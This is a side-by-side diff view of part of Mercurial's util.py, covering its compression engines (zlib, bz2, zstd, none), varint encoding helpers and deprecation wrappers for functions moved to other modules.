3296 compressed data. Return value is an object with a ``read(size)`` that
3309 compressed data. Return value is an object with a ``read(size)`` that
3297 returns uncompressed data.
3310 returns uncompressed data.
3298 """
3311 """
3299 raise NotImplementedError()
3312 raise NotImplementedError()
3300
3313
3301 def revlogcompressor(self, opts=None):
3314 def revlogcompressor(self, opts=None):
3302 """Obtain an object that can be used to compress revlog entries.
3315 """Obtain an object that can be used to compress revlog entries.
3303
3316
3304 The object has a ``compress(data)`` method that compresses binary
3317 The object has a ``compress(data)`` method that compresses binary
3305 data. This method returns compressed binary data or ``None`` if
3318 data. This method returns compressed binary data or ``None`` if
3306 the data could not be compressed (too small, not compressible, etc).
3319 the data could not be compressed (too small, not compressible, etc).
3307 The returned data should have a header uniquely identifying this
3320 The returned data should have a header uniquely identifying this
3308 compression format so decompression can be routed to this engine.
3321 compression format so decompression can be routed to this engine.
3309 This header should be identified by the ``revlogheader()`` return
3322 This header should be identified by the ``revlogheader()`` return
3310 value.
3323 value.
3311
3324
3312 The object has a ``decompress(data)`` method that decompresses
3325 The object has a ``decompress(data)`` method that decompresses
3313 data. The method will only be called if ``data`` begins with
3326 data. The method will only be called if ``data`` begins with
3314 ``revlogheader()``. The method should return the raw, uncompressed
3327 ``revlogheader()``. The method should return the raw, uncompressed
3315 data or raise a ``RevlogError``.
3328 data or raise a ``RevlogError``.
3316
3329
3317 The object is reusable but is not thread safe.
3330 The object is reusable but is not thread safe.
3318 """
3331 """
3319 raise NotImplementedError()
3332 raise NotImplementedError()
3320
3333
3321 class _zlibengine(compressionengine):
3334 class _zlibengine(compressionengine):
3322 def name(self):
3335 def name(self):
3323 return 'zlib'
3336 return 'zlib'
3324
3337
3325 def bundletype(self):
3338 def bundletype(self):
3326 """zlib compression using the DEFLATE algorithm.
3339 """zlib compression using the DEFLATE algorithm.
3327
3340
3328 All Mercurial clients should support this format. The compression
3341 All Mercurial clients should support this format. The compression
3329 algorithm strikes a reasonable balance between compression ratio
3342 algorithm strikes a reasonable balance between compression ratio
3330 and size.
3343 and size.
3331 """
3344 """
3332 return 'gzip', 'GZ'
3345 return 'gzip', 'GZ'
3333
3346
3334 def wireprotosupport(self):
3347 def wireprotosupport(self):
3335 return compewireprotosupport('zlib', 20, 20)
3348 return compewireprotosupport('zlib', 20, 20)
3336
3349
3337 def revlogheader(self):
3350 def revlogheader(self):
3338 return 'x'
3351 return 'x'
3339
3352
3340 def compressstream(self, it, opts=None):
3353 def compressstream(self, it, opts=None):
3341 opts = opts or {}
3354 opts = opts or {}
3342
3355
3343 z = zlib.compressobj(opts.get('level', -1))
3356 z = zlib.compressobj(opts.get('level', -1))
3344 for chunk in it:
3357 for chunk in it:
3345 data = z.compress(chunk)
3358 data = z.compress(chunk)
3346 # Not all calls to compress emit data. It is cheaper to inspect
3359 # Not all calls to compress emit data. It is cheaper to inspect
3347 # here than to feed empty chunks through generator.
3360 # here than to feed empty chunks through generator.
3348 if data:
3361 if data:
3349 yield data
3362 yield data
3350
3363
3351 yield z.flush()
3364 yield z.flush()
3352
3365
3353 def decompressorreader(self, fh):
3366 def decompressorreader(self, fh):
3354 def gen():
3367 def gen():
3355 d = zlib.decompressobj()
3368 d = zlib.decompressobj()
3356 for chunk in filechunkiter(fh):
3369 for chunk in filechunkiter(fh):
3357 while chunk:
3370 while chunk:
3358 # Limit output size to limit memory.
3371 # Limit output size to limit memory.
3359 yield d.decompress(chunk, 2 ** 18)
3372 yield d.decompress(chunk, 2 ** 18)
3360 chunk = d.unconsumed_tail
3373 chunk = d.unconsumed_tail
3361
3374
3362 return chunkbuffer(gen())
3375 return chunkbuffer(gen())
3363
3376
3364 class zlibrevlogcompressor(object):
3377 class zlibrevlogcompressor(object):
3365 def compress(self, data):
3378 def compress(self, data):
3366 insize = len(data)
3379 insize = len(data)
3367 # Caller handles empty input case.
3380 # Caller handles empty input case.
3368 assert insize > 0
3381 assert insize > 0
3369
3382
3370 if insize < 44:
3383 if insize < 44:
3371 return None
3384 return None
3372
3385
3373 elif insize <= 1000000:
3386 elif insize <= 1000000:
3374 compressed = zlib.compress(data)
3387 compressed = zlib.compress(data)
3375 if len(compressed) < insize:
3388 if len(compressed) < insize:
3376 return compressed
3389 return compressed
3377 return None
3390 return None
3378
3391
3379 # zlib makes an internal copy of the input buffer, doubling
3392 # zlib makes an internal copy of the input buffer, doubling
3380 # memory usage for large inputs. So do streaming compression
3393 # memory usage for large inputs. So do streaming compression
3381 # on large inputs.
3394 # on large inputs.
3382 else:
3395 else:
3383 z = zlib.compressobj()
3396 z = zlib.compressobj()
3384 parts = []
3397 parts = []
3385 pos = 0
3398 pos = 0
3386 while pos < insize:
3399 while pos < insize:
3387 pos2 = pos + 2**20
3400 pos2 = pos + 2**20
3388 parts.append(z.compress(data[pos:pos2]))
3401 parts.append(z.compress(data[pos:pos2]))
3389 pos = pos2
3402 pos = pos2
3390 parts.append(z.flush())
3403 parts.append(z.flush())
3391
3404
3392 if sum(map(len, parts)) < insize:
3405 if sum(map(len, parts)) < insize:
3393 return ''.join(parts)
3406 return ''.join(parts)
3394 return None
3407 return None
3395
3408
3396 def decompress(self, data):
3409 def decompress(self, data):
3397 try:
3410 try:
3398 return zlib.decompress(data)
3411 return zlib.decompress(data)
3399 except zlib.error as e:
3412 except zlib.error as e:
3400 raise error.RevlogError(_('revlog decompress error: %s') %
3413 raise error.RevlogError(_('revlog decompress error: %s') %
3401 stringutil.forcebytestr(e))
3414 stringutil.forcebytestr(e))
3402
3415
3403 def revlogcompressor(self, opts=None):
3416 def revlogcompressor(self, opts=None):
3404 return self.zlibrevlogcompressor()
3417 return self.zlibrevlogcompressor()
3405
3418
3406 compengines.register(_zlibengine())
3419 compengines.register(_zlibengine())
3407
3420
3408 class _bz2engine(compressionengine):
3421 class _bz2engine(compressionengine):
3409 def name(self):
3422 def name(self):
3410 return 'bz2'
3423 return 'bz2'
3411
3424
3412 def bundletype(self):
3425 def bundletype(self):
3413 """An algorithm that produces smaller bundles than ``gzip``.
3426 """An algorithm that produces smaller bundles than ``gzip``.
3414
3427
3415 All Mercurial clients should support this format.
3428 All Mercurial clients should support this format.
3416
3429
3417 This engine will likely produce smaller bundles than ``gzip`` but
3430 This engine will likely produce smaller bundles than ``gzip`` but
3418 will be significantly slower, both during compression and
3431 will be significantly slower, both during compression and
3419 decompression.
3432 decompression.
3420
3433
3421 If available, the ``zstd`` engine can yield similar or better
3434 If available, the ``zstd`` engine can yield similar or better
3422 compression at much higher speeds.
3435 compression at much higher speeds.
3423 """
3436 """
3424 return 'bzip2', 'BZ'
3437 return 'bzip2', 'BZ'
3425
3438
3426 # We declare a protocol name but don't advertise by default because
3439 # We declare a protocol name but don't advertise by default because
3427 # it is slow.
3440 # it is slow.
3428 def wireprotosupport(self):
3441 def wireprotosupport(self):
3429 return compewireprotosupport('bzip2', 0, 0)
3442 return compewireprotosupport('bzip2', 0, 0)
3430
3443
3431 def compressstream(self, it, opts=None):
3444 def compressstream(self, it, opts=None):
3432 opts = opts or {}
3445 opts = opts or {}
3433 z = bz2.BZ2Compressor(opts.get('level', 9))
3446 z = bz2.BZ2Compressor(opts.get('level', 9))
3434 for chunk in it:
3447 for chunk in it:
3435 data = z.compress(chunk)
3448 data = z.compress(chunk)
3436 if data:
3449 if data:
3437 yield data
3450 yield data
3438
3451
3439 yield z.flush()
3452 yield z.flush()
3440
3453
3441 def decompressorreader(self, fh):
3454 def decompressorreader(self, fh):
3442 def gen():
3455 def gen():
3443 d = bz2.BZ2Decompressor()
3456 d = bz2.BZ2Decompressor()
3444 for chunk in filechunkiter(fh):
3457 for chunk in filechunkiter(fh):
3445 yield d.decompress(chunk)
3458 yield d.decompress(chunk)
3446
3459
3447 return chunkbuffer(gen())
3460 return chunkbuffer(gen())
3448
3461
3449 compengines.register(_bz2engine())
3462 compengines.register(_bz2engine())
3450
3463
3451 class _truncatedbz2engine(compressionengine):
3464 class _truncatedbz2engine(compressionengine):
3452 def name(self):
3465 def name(self):
3453 return 'bz2truncated'
3466 return 'bz2truncated'
3454
3467
3455 def bundletype(self):
3468 def bundletype(self):
3456 return None, '_truncatedBZ'
3469 return None, '_truncatedBZ'
3457
3470
3458 # We don't implement compressstream because it is hackily handled elsewhere.
3471 # We don't implement compressstream because it is hackily handled elsewhere.
3459
3472
3460 def decompressorreader(self, fh):
3473 def decompressorreader(self, fh):
3461 def gen():
3474 def gen():
3462 # The input stream doesn't have the 'BZ' header. So add it back.
3475 # The input stream doesn't have the 'BZ' header. So add it back.
3463 d = bz2.BZ2Decompressor()
3476 d = bz2.BZ2Decompressor()
3464 d.decompress('BZ')
3477 d.decompress('BZ')
3465 for chunk in filechunkiter(fh):
3478 for chunk in filechunkiter(fh):
3466 yield d.decompress(chunk)
3479 yield d.decompress(chunk)
3467
3480
3468 return chunkbuffer(gen())
3481 return chunkbuffer(gen())
3469
3482
3470 compengines.register(_truncatedbz2engine())
3483 compengines.register(_truncatedbz2engine())
3471
3484
3472 class _noopengine(compressionengine):
3485 class _noopengine(compressionengine):
3473 def name(self):
3486 def name(self):
3474 return 'none'
3487 return 'none'
3475
3488
3476 def bundletype(self):
3489 def bundletype(self):
3477 """No compression is performed.
3490 """No compression is performed.
3478
3491
3479 Use this compression engine to explicitly disable compression.
3492 Use this compression engine to explicitly disable compression.
3480 """
3493 """
3481 return 'none', 'UN'
3494 return 'none', 'UN'
3482
3495
3483 # Clients always support uncompressed payloads. Servers don't because
3496 # Clients always support uncompressed payloads. Servers don't because
3484 # unless you are on a fast network, uncompressed payloads can easily
3497 # unless you are on a fast network, uncompressed payloads can easily
3485 # saturate your network pipe.
3498 # saturate your network pipe.
3486 def wireprotosupport(self):
3499 def wireprotosupport(self):
3487 return compewireprotosupport('none', 0, 10)
3500 return compewireprotosupport('none', 0, 10)
3488
3501
3489 # We don't implement revlogheader because it is handled specially
3502 # We don't implement revlogheader because it is handled specially
3490 # in the revlog class.
3503 # in the revlog class.
3491
3504
3492 def compressstream(self, it, opts=None):
3505 def compressstream(self, it, opts=None):
3493 return it
3506 return it
3494
3507
3495 def decompressorreader(self, fh):
3508 def decompressorreader(self, fh):
3496 return fh
3509 return fh
3497
3510
3498 class nooprevlogcompressor(object):
3511 class nooprevlogcompressor(object):
3499 def compress(self, data):
3512 def compress(self, data):
3500 return None
3513 return None
3501
3514
3502 def revlogcompressor(self, opts=None):
3515 def revlogcompressor(self, opts=None):
3503 return self.nooprevlogcompressor()
3516 return self.nooprevlogcompressor()
3504
3517
3505 compengines.register(_noopengine())
3518 compengines.register(_noopengine())
3506
3519
3507 class _zstdengine(compressionengine):
3520 class _zstdengine(compressionengine):
3508 def name(self):
3521 def name(self):
3509 return 'zstd'
3522 return 'zstd'
3510
3523
3511 @propertycache
3524 @propertycache
3512 def _module(self):
3525 def _module(self):
3513 # Not all installs have the zstd module available. So defer importing
3526 # Not all installs have the zstd module available. So defer importing
3514 # until first access.
3527 # until first access.
3515 try:
3528 try:
3516 from . import zstd
3529 from . import zstd
3517 # Force delayed import.
3530 # Force delayed import.
3518 zstd.__version__
3531 zstd.__version__
3519 return zstd
3532 return zstd
3520 except ImportError:
3533 except ImportError:
3521 return None
3534 return None
3522
3535
3523 def available(self):
3536 def available(self):
3524 return bool(self._module)
3537 return bool(self._module)
3525
3538
3526 def bundletype(self):
3539 def bundletype(self):
3527 """A modern compression algorithm that is fast and highly flexible.
3540 """A modern compression algorithm that is fast and highly flexible.
3528
3541
3529 Only supported by Mercurial 4.1 and newer clients.
3542 Only supported by Mercurial 4.1 and newer clients.
3530
3543
3531 With the default settings, zstd compression is both faster and yields
3544 With the default settings, zstd compression is both faster and yields
3532 better compression than ``gzip``. It also frequently yields better
3545 better compression than ``gzip``. It also frequently yields better
3533 compression than ``bzip2`` while operating at much higher speeds.
3546 compression than ``bzip2`` while operating at much higher speeds.
3534
3547
3535 If this engine is available and backwards compatibility is not a
3548 If this engine is available and backwards compatibility is not a
3536 concern, it is likely the best available engine.
3549 concern, it is likely the best available engine.
3537 """
3550 """
3538 return 'zstd', 'ZS'
3551 return 'zstd', 'ZS'
3539
3552
3540 def wireprotosupport(self):
3553 def wireprotosupport(self):
3541 return compewireprotosupport('zstd', 50, 50)
3554 return compewireprotosupport('zstd', 50, 50)
3542
3555
3543 def revlogheader(self):
3556 def revlogheader(self):
3544 return '\x28'
3557 return '\x28'
3545
3558
3546 def compressstream(self, it, opts=None):
3559 def compressstream(self, it, opts=None):
3547 opts = opts or {}
3560 opts = opts or {}
3548 # zstd level 3 is almost always significantly faster than zlib
3561 # zstd level 3 is almost always significantly faster than zlib
3549 # while providing no worse compression. It strikes a good balance
3562 # while providing no worse compression. It strikes a good balance
3550 # between speed and compression.
3563 # between speed and compression.
3551 level = opts.get('level', 3)
3564 level = opts.get('level', 3)
3552
3565
3553 zstd = self._module
3566 zstd = self._module
3554 z = zstd.ZstdCompressor(level=level).compressobj()
3567 z = zstd.ZstdCompressor(level=level).compressobj()
3555 for chunk in it:
3568 for chunk in it:
3556 data = z.compress(chunk)
3569 data = z.compress(chunk)
3557 if data:
3570 if data:
3558 yield data
3571 yield data
3559
3572
3560 yield z.flush()
3573 yield z.flush()
3561
3574
3562 def decompressorreader(self, fh):
3575 def decompressorreader(self, fh):
3563 zstd = self._module
3576 zstd = self._module
3564 dctx = zstd.ZstdDecompressor()
3577 dctx = zstd.ZstdDecompressor()
3565 return chunkbuffer(dctx.read_from(fh))
3578 return chunkbuffer(dctx.read_from(fh))
3566
3579
3567 class zstdrevlogcompressor(object):
3580 class zstdrevlogcompressor(object):
3568 def __init__(self, zstd, level=3):
3581 def __init__(self, zstd, level=3):
3569 # TODO consider omitting frame magic to save 4 bytes.
3582 # TODO consider omitting frame magic to save 4 bytes.
3570 # This writes content sizes into the frame header. That is
3583 # This writes content sizes into the frame header. That is
3571 # extra storage. But it allows a correct size memory allocation
3584 # extra storage. But it allows a correct size memory allocation
3572 # to hold the result.
3585 # to hold the result.
3573 self._cctx = zstd.ZstdCompressor(level=level)
3586 self._cctx = zstd.ZstdCompressor(level=level)
3574 self._dctx = zstd.ZstdDecompressor()
3587 self._dctx = zstd.ZstdDecompressor()
3575 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3588 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3576 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3589 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3577
3590
3578 def compress(self, data):
3591 def compress(self, data):
3579 insize = len(data)
3592 insize = len(data)
3580 # Caller handles empty input case.
3593 # Caller handles empty input case.
3581 assert insize > 0
3594 assert insize > 0
3582
3595
3583 if insize < 50:
3596 if insize < 50:
3584 return None
3597 return None
3585
3598
3586 elif insize <= 1000000:
3599 elif insize <= 1000000:
3587 compressed = self._cctx.compress(data)
3600 compressed = self._cctx.compress(data)
3588 if len(compressed) < insize:
3601 if len(compressed) < insize:
3589 return compressed
3602 return compressed
3590 return None
3603 return None
3591 else:
3604 else:
3592 z = self._cctx.compressobj()
3605 z = self._cctx.compressobj()
3593 chunks = []
3606 chunks = []
3594 pos = 0
3607 pos = 0
3595 while pos < insize:
3608 while pos < insize:
3596 pos2 = pos + self._compinsize
3609 pos2 = pos + self._compinsize
3597 chunk = z.compress(data[pos:pos2])
3610 chunk = z.compress(data[pos:pos2])
3598 if chunk:
3611 if chunk:
3599 chunks.append(chunk)
3612 chunks.append(chunk)
3600 pos = pos2
3613 pos = pos2
3601 chunks.append(z.flush())
3614 chunks.append(z.flush())
3602
3615
3603 if sum(map(len, chunks)) < insize:
3616 if sum(map(len, chunks)) < insize:
3604 return ''.join(chunks)
3617 return ''.join(chunks)
3605 return None
3618 return None
3606
3619
3607 def decompress(self, data):
3620 def decompress(self, data):
3608 insize = len(data)
3621 insize = len(data)
3609
3622
3610 try:
3623 try:
3611 # This was measured to be faster than other streaming
3624 # This was measured to be faster than other streaming
3612 # decompressors.
3625 # decompressors.
3613 dobj = self._dctx.decompressobj()
3626 dobj = self._dctx.decompressobj()
3614 chunks = []
3627 chunks = []
3615 pos = 0
3628 pos = 0
3616 while pos < insize:
3629 while pos < insize:
3617 pos2 = pos + self._decompinsize
3630 pos2 = pos + self._decompinsize
3618 chunk = dobj.decompress(data[pos:pos2])
3631 chunk = dobj.decompress(data[pos:pos2])
3619 if chunk:
3632 if chunk:
3620 chunks.append(chunk)
3633 chunks.append(chunk)
3621 pos = pos2
3634 pos = pos2
3622 # Frame should be exhausted, so no finish() API.
3635 # Frame should be exhausted, so no finish() API.
3623
3636
3624 return ''.join(chunks)
3637 return ''.join(chunks)
3625 except Exception as e:
3638 except Exception as e:
3626 raise error.RevlogError(_('revlog decompress error: %s') %
3639 raise error.RevlogError(_('revlog decompress error: %s') %
3627 stringutil.forcebytestr(e))
3640 stringutil.forcebytestr(e))
3628
3641
3629 def revlogcompressor(self, opts=None):
3642 def revlogcompressor(self, opts=None):
3630 opts = opts or {}
3643 opts = opts or {}
3631 return self.zstdrevlogcompressor(self._module,
3644 return self.zstdrevlogcompressor(self._module,
3632 level=opts.get('level', 3))
3645 level=opts.get('level', 3))
3633
3646
3634 compengines.register(_zstdengine())
3647 compengines.register(_zstdengine())
3635
3648
3636 def bundlecompressiontopics():
3649 def bundlecompressiontopics():
3637 """Obtains a list of available bundle compressions for use in help."""
3650 """Obtains a list of available bundle compressions for use in help."""
3638 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3651 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3639 items = {}
3652 items = {}
3640
3653
3641 # We need to format the docstring. So use a dummy object/type to hold it
3654 # We need to format the docstring. So use a dummy object/type to hold it
3642 # rather than mutating the original.
3655 # rather than mutating the original.
3643 class docobject(object):
3656 class docobject(object):
3644 pass
3657 pass
3645
3658
3646 for name in compengines:
3659 for name in compengines:
3647 engine = compengines[name]
3660 engine = compengines[name]
3648
3661
3649 if not engine.available():
3662 if not engine.available():
3650 continue
3663 continue
3651
3664
3652 bt = engine.bundletype()
3665 bt = engine.bundletype()
3653 if not bt or not bt[0]:
3666 if not bt or not bt[0]:
3654 continue
3667 continue
3655
3668
3656 doc = pycompat.sysstr('``%s``\n %s') % (
3669 doc = pycompat.sysstr('``%s``\n %s') % (
3657 bt[0], engine.bundletype.__doc__)
3670 bt[0], engine.bundletype.__doc__)
3658
3671
3659 value = docobject()
3672 value = docobject()
3660 value.__doc__ = doc
3673 value.__doc__ = doc
3661 value._origdoc = engine.bundletype.__doc__
3674 value._origdoc = engine.bundletype.__doc__
3662 value._origfunc = engine.bundletype
3675 value._origfunc = engine.bundletype
3663
3676
3664 items[bt[0]] = value
3677 items[bt[0]] = value
3665
3678
3666 return items
3679 return items
3667
3680
3668 i18nfunctions = bundlecompressiontopics().values()
3681 i18nfunctions = bundlecompressiontopics().values()
3669
3682
3670 # convenient shortcut
3683 # convenient shortcut
3671 dst = debugstacktrace
3684 dst = debugstacktrace
3672
3685
3673 def safename(f, tag, ctx, others=None):
3686 def safename(f, tag, ctx, others=None):
3674 """
3687 """
3675 Generate a name that it is safe to rename f to in the given context.
3688 Generate a name that it is safe to rename f to in the given context.
3676
3689
3677 f: filename to rename
3690 f: filename to rename
3678 tag: a string tag that will be included in the new name
3691 tag: a string tag that will be included in the new name
3679 ctx: a context, in which the new name must not exist
3692 ctx: a context, in which the new name must not exist
3680 others: a set of other filenames that the new name must not be in
3693 others: a set of other filenames that the new name must not be in
3681
3694
3682 Returns a file name of the form oldname~tag[~number] which does not exist
3695 Returns a file name of the form oldname~tag[~number] which does not exist
3683 in the provided context and is not in the set of other names.
3696 in the provided context and is not in the set of other names.
3684 """
3697 """
3685 if others is None:
3698 if others is None:
3686 others = set()
3699 others = set()
3687
3700
3688 fn = '%s~%s' % (f, tag)
3701 fn = '%s~%s' % (f, tag)
3689 if fn not in ctx and fn not in others:
3702 if fn not in ctx and fn not in others:
3690 return fn
3703 return fn
3691 for n in itertools.count(1):
3704 for n in itertools.count(1):
3692 fn = '%s~%s~%s' % (f, tag, n)
3705 fn = '%s~%s~%s' % (f, tag, n)
3693 if fn not in ctx and fn not in others:
3706 if fn not in ctx and fn not in others:
3694 return fn
3707 return fn
3695
3708
3696 def readexactly(stream, n):
3709 def readexactly(stream, n):
3697 '''read n bytes from stream.read and abort if less was available'''
3710 '''read n bytes from stream.read and abort if less was available'''
3698 s = stream.read(n)
3711 s = stream.read(n)
3699 if len(s) < n:
3712 if len(s) < n:
3700 raise error.Abort(_("stream ended unexpectedly"
3713 raise error.Abort(_("stream ended unexpectedly"
3701 " (got %d bytes, expected %d)")
3714 " (got %d bytes, expected %d)")
3702 % (len(s), n))
3715 % (len(s), n))
3703 return s
3716 return s
3704
3717
3705 def uvarintencode(value):
3718 def uvarintencode(value):
3706 """Encode an unsigned integer value to a varint.
3719 """Encode an unsigned integer value to a varint.
3707
3720
3708 A varint is a variable length integer of 1 or more bytes. Each byte
3721 A varint is a variable length integer of 1 or more bytes. Each byte
3709 except the last has the most significant bit set. The lower 7 bits of
3722 except the last has the most significant bit set. The lower 7 bits of
3710 each byte store the 2's complement representation, least significant group
3723 each byte store the 2's complement representation, least significant group
3711 first.
3724 first.
3712
3725
3713 >>> uvarintencode(0)
3726 >>> uvarintencode(0)
3714 '\\x00'
3727 '\\x00'
3715 >>> uvarintencode(1)
3728 >>> uvarintencode(1)
3716 '\\x01'
3729 '\\x01'
3717 >>> uvarintencode(127)
3730 >>> uvarintencode(127)
3718 '\\x7f'
3731 '\\x7f'
3719 >>> uvarintencode(1337)
3732 >>> uvarintencode(1337)
3720 '\\xb9\\n'
3733 '\\xb9\\n'
3721 >>> uvarintencode(65536)
3734 >>> uvarintencode(65536)
3722 '\\x80\\x80\\x04'
3735 '\\x80\\x80\\x04'
3723 >>> uvarintencode(-1)
3736 >>> uvarintencode(-1)
3724 Traceback (most recent call last):
3737 Traceback (most recent call last):
3725 ...
3738 ...
3726 ProgrammingError: negative value for uvarint: -1
3739 ProgrammingError: negative value for uvarint: -1
3727 """
3740 """
3728 if value < 0:
3741 if value < 0:
3729 raise error.ProgrammingError('negative value for uvarint: %d'
3742 raise error.ProgrammingError('negative value for uvarint: %d'
3730 % value)
3743 % value)
3731 bits = value & 0x7f
3744 bits = value & 0x7f
3732 value >>= 7
3745 value >>= 7
3733 bytes = []
3746 bytes = []
3734 while value:
3747 while value:
3735 bytes.append(pycompat.bytechr(0x80 | bits))
3748 bytes.append(pycompat.bytechr(0x80 | bits))
3736 bits = value & 0x7f
3749 bits = value & 0x7f
3737 value >>= 7
3750 value >>= 7
3738 bytes.append(pycompat.bytechr(bits))
3751 bytes.append(pycompat.bytechr(bits))
3739
3752
3740 return ''.join(bytes)
3753 return ''.join(bytes)
3741
3754
3742 def uvarintdecodestream(fh):
3755 def uvarintdecodestream(fh):
3743 """Decode an unsigned variable length integer from a stream.
3756 """Decode an unsigned variable length integer from a stream.
3744
3757
3745 The passed argument is anything that has a ``.read(N)`` method.
3758 The passed argument is anything that has a ``.read(N)`` method.
3746
3759
3747 >>> try:
3760 >>> try:
3748 ... from StringIO import StringIO as BytesIO
3761 ... from StringIO import StringIO as BytesIO
3749 ... except ImportError:
3762 ... except ImportError:
3750 ... from io import BytesIO
3763 ... from io import BytesIO
3751 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3764 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3752 0
3765 0
3753 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3766 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3754 1
3767 1
3755 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3768 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3756 127
3769 127
3757 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3770 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3758 1337
3771 1337
3759 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3772 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3760 65536
3773 65536
3761 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3774 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3762 Traceback (most recent call last):
3775 Traceback (most recent call last):
3763 ...
3776 ...
3764 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3777 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3765 """
3778 """
3766 result = 0
3779 result = 0
3767 shift = 0
3780 shift = 0
3768 while True:
3781 while True:
3769 byte = ord(readexactly(fh, 1))
3782 byte = ord(readexactly(fh, 1))
3770 result |= ((byte & 0x7f) << shift)
3783 result |= ((byte & 0x7f) << shift)
3771 if not (byte & 0x80):
3784 if not (byte & 0x80):
3772 return result
3785 return result
3773 shift += 7
3786 shift += 7
3774
3787
3775 ###
3788 ###
3776 # Deprecation warnings for util.py splitting
3789 # Deprecation warnings for util.py splitting
3777 ###
3790 ###
3778
3791
3779 def _deprecatedfunc(func, version, modname=None):
3792 def _deprecatedfunc(func, version, modname=None):
3780 def wrapped(*args, **kwargs):
3793 def wrapped(*args, **kwargs):
3781 fn = pycompat.sysbytes(func.__name__)
3794 fn = pycompat.sysbytes(func.__name__)
3782 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3795 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3783 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3796 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3784 nouideprecwarn(msg, version, stacklevel=2)
3797 nouideprecwarn(msg, version, stacklevel=2)
3785 return func(*args, **kwargs)
3798 return func(*args, **kwargs)
3786 wrapped.__name__ = func.__name__
3799 wrapped.__name__ = func.__name__
3787 return wrapped
3800 return wrapped
3788
3801
3789 defaultdateformats = dateutil.defaultdateformats
3802 defaultdateformats = dateutil.defaultdateformats
3790 extendeddateformats = dateutil.extendeddateformats
3803 extendeddateformats = dateutil.extendeddateformats
3791 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3804 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3792 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3805 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3793 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3806 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3794 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3807 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3795 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3808 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3796 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3809 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3797 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3810 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3798
3811
3799 stderr = procutil.stderr
3812 stderr = procutil.stderr
3800 stdin = procutil.stdin
3813 stdin = procutil.stdin
3801 stdout = procutil.stdout
3814 stdout = procutil.stdout
3802 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3815 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3803 modname='utils.procutil')
3816 modname='utils.procutil')
3804 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3817 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3805 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3818 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3806 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3819 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3807 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3820 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3808 modname='utils.procutil')
3821 modname='utils.procutil')
3809 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3822 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3810 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3823 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3811 modname='utils.procutil')
3824 modname='utils.procutil')
3812 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3825 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3813 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3826 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3814 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3827 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3815 modname='utils.procutil')
3828 modname='utils.procutil')
3816 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3829 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3817 modname='utils.procutil')
3830 modname='utils.procutil')
3818 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3831 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3819 modname='utils.procutil')
3832 modname='utils.procutil')
3820 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3833 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3821 modname='utils.procutil')
3834 modname='utils.procutil')
3822 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3835 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
